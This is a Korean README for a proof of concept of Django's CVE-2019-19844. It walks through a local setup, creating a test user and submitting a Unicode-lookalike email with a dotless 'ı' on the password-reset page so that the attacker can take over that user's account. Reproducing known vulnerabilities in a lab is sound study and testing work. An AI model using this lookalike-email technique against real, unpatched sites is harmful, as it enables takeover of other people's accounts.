
CVE-2019-19844에 대한 PoC(https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)
CVE-2019-19844에 대한 PoC
django_cve_2019_19844_poc)DJANGO_DATABASE_NAME에 데이터베이스 이름을 설정합니다(예: export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc)pip install -r requirements.txt && ./manage.py migrate --noinput를 실행합니다shell 명령으로 다음 사용자를 생성합니다:>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', '[email protected]', 'test123')
./manage.py runserver를 실행합니다http://127.0.0.1:8000/accounts/password-reset/를 엽니다mı[email protected](공격자의 이메일)를 입력하고 전송 버튼을 클릭합니다mike123 사용자로 로그인합니다